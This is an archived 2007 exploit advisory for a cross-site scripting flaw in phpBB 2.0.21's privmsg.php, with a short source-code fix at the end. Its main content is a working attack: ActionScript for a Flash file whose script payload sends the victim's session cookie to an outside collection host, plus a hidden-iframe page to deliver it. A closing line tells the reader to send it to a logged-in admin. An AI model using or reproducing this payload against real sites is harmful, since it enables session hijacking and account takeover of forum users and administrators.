Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15681
HistoryJan 11, 2007 - 12:00 a.m.

phpBB (privmsg.php) XSS Exploit

2007-01-1100:00:00
vulners.com
19

phpBB (privmsg.php) XSS Exploit

By: Demential
Web: http://headburn.altervista.org
E-mail: [email protected]
PhpBB website: http://phpbb.com

Exploit tested on phpBB 2.0.21

Secunia.com said:

Input passed to the form field "Message body" in privmsg.php
is not properly sanitised before it is returned to the user
when sending messages to a non-existent user.
This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.

The Exploit:

Create a Shockwave Flash file with this code:

var username:String = "user_that_doesnt_exist";
var subject:String = "Xss Exploitation";
var message:String = "</textarea><script>document.location= 'http://site.com/cookie.php?c=&#39; + document.cookie </script>";
var folder:String = "inbox";
var mode:String = "post";
var post:String = "Submit";
getURL("http://victim.com/phpBB2/privmsg.php&quot;, "_self", "POST");

Put it into a web page:

<html>
<head>
<title>Put a title here</title>
</head>
<body>
<p>Put some text here<p>
<iframe src="http://yoursite.com/exploit.swf&quot; frameborder="0" height="0" width="0"></iframe>
</body>
</html>

And send it to the admin (or a normal user)
users must be logged-in.

Fixing:

open phpBB2/privmsg.php
find:

                    if &#40;!&#40;$to_userdata = $db-&gt;sql_fetchrow&#40;$result&#41;&#41;&#41;
                    {
                            $error = TRUE;
                            $error_msg = $lang[&#39;No_such_user&#39;];

replace with:

                    if &#40;!&#40;$to_userdata = $db-&gt;sql_fetchrow&#40;$result&#41;&#41;&#41;
                    {
                            $error = TRUE;
                            echo &quot;Sorry, but no such user exists.&quot;;
                            exit;